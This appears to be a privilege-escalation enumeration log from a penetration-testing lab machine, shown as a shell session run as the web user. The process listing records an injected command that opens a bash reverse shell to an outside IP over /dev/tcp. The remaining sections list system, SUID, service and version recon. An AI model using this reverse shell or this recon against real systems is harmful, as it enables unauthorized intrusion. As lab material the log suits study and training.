System/Kernel
www-data@UC404:/var/www/html/under_construction$ uname -a ; cat /etc/*release
Linux UC404 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"x86_64
4.19.0-12-amd64
Debian 10 (buster)
Networks
www-data@UC404:/var/www/html/under_construction$ ip route ; arp -a
default via 192.168.125.254 dev ens192 onlink
192.168.125.0/24 dev ens192 proto kernel scope link src 192.168.125.109
? (192.168.125.254) at 00:50:56:9e:72:00 [ether] on ens192www-data@UC404:/var/www/html/under_construction$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:49749 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:55767 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:40129 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:32873 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 141 192.168.125.109:57020 192.168.45.163:9999 ESTABLISHED 4826/bash
udp 0 0 127.0.0.1:35331 127.0.0.1:57011 ESTABLISHED -
udp 0 0 0.0.0.0:50797 0.0.0.0:* -
udp 0 0 0.0.0.0:47731 0.0.0.0:* -
udp 0 0 127.0.0.1:57011 127.0.0.1:35331 ESTABLISHED -
udp 0 0 0.0.0.0:42732 0.0.0.0:* -
udp 0 0 0.0.0.0:60304 0.0.0.0:* -
udp 0 0 0.0.0.0:2049 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:42190 0.0.0.0:* - Users & Groups
www-data@UC404:/var/www/html/under_construction$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
_rpc:x:106:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:107:65534::/var/lib/nfs:/usr/sbin/nologin
brian:x:1001:1001:,,,:/home/brian:/bin/bash
total 12K
4.0K drwxr-xr-x 2 brian brian 4.0K Oct 27 2020 brian
4.0K drwxr-xr-x 3 root root 4.0K Oct 27 2020 .
4.0K drwxr-xr-x 18 root root 4.0K Oct 20 2020 ..brian
www-data@UC404:/var/www/html/under_construction$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=106(_rpc) gid=65534(nogroup) groups=65534(nogroup)
uid=107(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=1001(brian) gid=1001(brian) groups=1001(brian)uid=1001(brian) gid=1001(brian) groups=1001(brian)
SUIDs
www-data@UC404:/var/www/html/under_construction$ find / -perm -04000 -ls -type f 2>/dev/null
273373 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
276719 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
398815 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
280784 116 -rwsr-xr-x 1 root root 114784 Jun 24 2020 /usr/sbin/mount.nfs
266035 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
262183 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
265710 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
279097 36 -rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
266037 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
262179 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
262180 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
265563 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
269340 156 -rwsr-xr-x 1 root root 157192 Feb 2 2020 /usr/bin/sudo
262182 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswdSGIDs
www-data@UC404:/var/www/html/under_construction$ find / -type f -perm -02000 -ls 2>/dev/null
2>/dev/null f -perm -02000 -ls
262984 40 -rwxr-sr-x 1 root shadow 39616 Feb 14 2019 /usr/sbin/unix_chkpwd
273564 20 -rwxr-sr-x 1 root mail 18944 Dec 3 2017 /usr/bin/dotlockfile
262181 32 -rwxr-sr-x 1 root shadow 31000 Jul 27 2018 /usr/bin/expiry
276712 316 -rwxr-sr-x 1 root ssh 321672 Jan 31 2020 /usr/bin/ssh-agent
268064 16 -rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write
262178 72 -rwxr-sr-x 1 root shadow 71816 Jul 27 2018 /usr/bin/chage
268184 44 -rwxr-sr-x 1 root crontab 43568 Oct 11 2019 /usr/bin/crontab
263608 36 -rwxr-sr-x 1 root tty 34896 Jan 10 2019 /usr/bin/wallCapabilities
www-data@UC404:/var/www/html/under_construction$ /usr/sbin/getcap -r / 2>/dev/null
/usr/lib/squid/pinger = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+epProcesses
www-data@UC404:/var/www/html/under_construction$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.5 169400 10228 ? Ss 09:33 0:00 /sbin/init
root 258 0.0 0.4 32740 8872 ? Ss 09:33 0:00 /lib/systemd/systemd-journald
root 280 0.0 0.0 7688 216 ? Ss 09:33 0:00 /usr/sbin/blkmapd
root 285 0.0 0.2 22196 5172 ? Ss 09:33 0:00 /lib/systemd/systemd-udevd
root 313 0.0 0.0 9080 168 ? Ss 09:33 0:00 /usr/sbin/rpc.idmapd
systemd+ 396 0.0 0.3 93084 6528 ? Ssl 09:33 0:00 /lib/systemd/systemd-timesyncd
root 397 0.0 0.5 48220 10580 ? Ss 09:33 0:00 /usr/bin/VGAuthService
_rpc 398 0.0 0.1 6960 3728 ? Ss 09:33 0:00 /sbin/rpcbind -f -w
root 399 0.0 0.5 122876 12212 ? Ssl 09:33 0:06 /usr/bin/vmtoolsd
root 421 0.0 1.3 31864 27088 ? Ss 09:33 0:00 /usr/sbin/rpc.mountd --manage-gids
root 425 0.0 0.4 225824 8352 ? Ssl 09:33 0:00 /usr/sbin/rsyslogd -n -iNONE
message+ 426 0.0 0.2 9280 4584 ? Ss 09:33 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 430 0.0 0.3 19308 6412 ? Ss 09:33 0:00 /lib/systemd/systemd-logind
root 449 0.0 0.3 15852 6888 ? Ss 09:33 0:00 /usr/sbin/sshd -D
root 479 0.0 0.1 8504 2848 ? Ss 09:33 0:00 /usr/sbin/cron -f
root 484 0.0 0.0 5612 1608 tty1 Ss+ 09:33 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 554 0.0 0.5 71840 10552 ? Ss 09:33 0:00 /usr/sbin/squid -sYC
root 571 0.0 0.9 196792 19680 ? Ss 09:33 0:01 /usr/sbin/apache2 -k start
proxy 967 0.0 1.1 77140 23148 ? S 09:35 0:00 (squid-1) --kid squid-1 -sYC
proxy 968 0.0 0.0 5504 1624 ? S 09:35 0:00 (logfile-daemon) /var/log/squid/access.log
proxy 969 0.0 0.0 0 0 ? Z 09:35 0:00 [squid] <defunct>
www-data 4756 0.0 0.6 197304 13684 ? S 13:34 0:00 /usr/sbin/apache2 -k start
www-data 4760 0.0 0.4 197100 9968 ? S 13:34 0:00 /usr/sbin/apache2 -k start
www-data 4763 0.0 0.4 197100 9968 ? S 13:35 0:00 /usr/sbin/apache2 -k start
www-data 4818 0.0 0.4 197100 9968 ? S 13:42 0:00 /usr/sbin/apache2 -k start
www-data 4822 0.0 0.4 197100 9968 ? S 13:42 0:00 /usr/sbin/apache2 -k start
www-data 4823 0.0 0.0 2388 756 ? S 13:43 0:00 sh -c php sendmail.php &bash -c "bash -i >& /dev/tcp/192.168.45.163/9999 0>&1"
www-data 4825 0.0 0.1 3736 2836 ? S 13:43 0:00 bash -c bash -i >& /dev/tcp/192.168.45.163/9999 0>&1
www-data 4826 0.0 0.1 4000 3308 ? S 13:43 0:00 bash -i
www-data 4827 0.0 0.4 197100 9968 ? S 13:43 0:00 /usr/sbin/apache2 -k start
www-data 4877 0.0 0.1 7924 2796 ? R 13:49 0:00 ps -auxwwwroot 280 0.0 0.0 7688 216 ? Ss 09:33 0:00 /usr/sbin/blkmapd
root 421 0.0 1.3 31864 27088 ? Ss 09:33 0:00 /usr/sbin/rpc.mountd --manage-gids
root 479 0.0 0.1 8504 2848 ? Ss 09:33 0:00 /usr/sbin/cron -f
root 554 0.0 0.5 71840 10552 ? Ss 09:33 0:00 /usr/sbin/squid -sYC
proxy 968 0.0 0.0 5504 1624 ? S 09:35 0:00 (logfile-daemon) /var/log/squid/access.log
Cron & Systemd
www-data@UC404:/var/www/html/under_construction$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sun 2025-02-23 14:09:00 EST 17min left Sun 2025-02-23 13:39:01 EST 12min ago phpsessionclean.timer phpsessionclean.service
Sun 2025-02-23 21:15:33 EST 7h left Sun 2025-02-23 09:35:28 EST 4h 16min ago apt-daily.timer apt-daily.service
Mon 2025-02-24 00:00:00 EST 10h left Sun 2025-02-23 09:35:28 EST 4h 16min ago logrotate.timer logrotate.service
Mon 2025-02-24 00:00:00 EST 10h left Sun 2025-02-23 09:35:28 EST 4h 16min ago man-db.timer man-db.service
Mon 2025-02-24 06:46:04 EST 16h left Sun 2025-02-23 09:35:28 EST 4h 16min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2025-02-24 09:48:15 EST 19h left Sun 2025-02-23 09:48:15 EST 4h 3min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
6 timers listed.
Pass --all to see loaded but inactive timers, too.Services
www-data@UC404:/var/www/html/under_construction$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
apache2.service loaded active running The Apache HTTP Server
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
nfs-blkmap.service loaded active running pNFS block layout mapping daemon
nfs-idmapd.service loaded active running NFSv4 ID-name mapping service
nfs-mountd.service loaded active running NFS Mount Daemon
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
rpcbind.service loaded active running RPC bind portmap service
rsyslog.service loaded active running System Logging Service
squid.service loaded active running Squid Web Proxy Server
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
rpcbind.socket loaded active running RPCbind Server Activation Socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
27 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.squid.service
Sudo Version
www-data@UC404:/var/www/html/under_construction$ sudo --version
Sudo version 1.8.27
Sudoers policy plugin version 1.8.27
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.27Sudo version 1.8.27
Glibc Version
www-data@UC404:/var/www/html/under_construction$ ldd --version
ldd (Debian GLIBC 2.28-10) 2.28
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Debian GLIBC 2.28-10) 2.28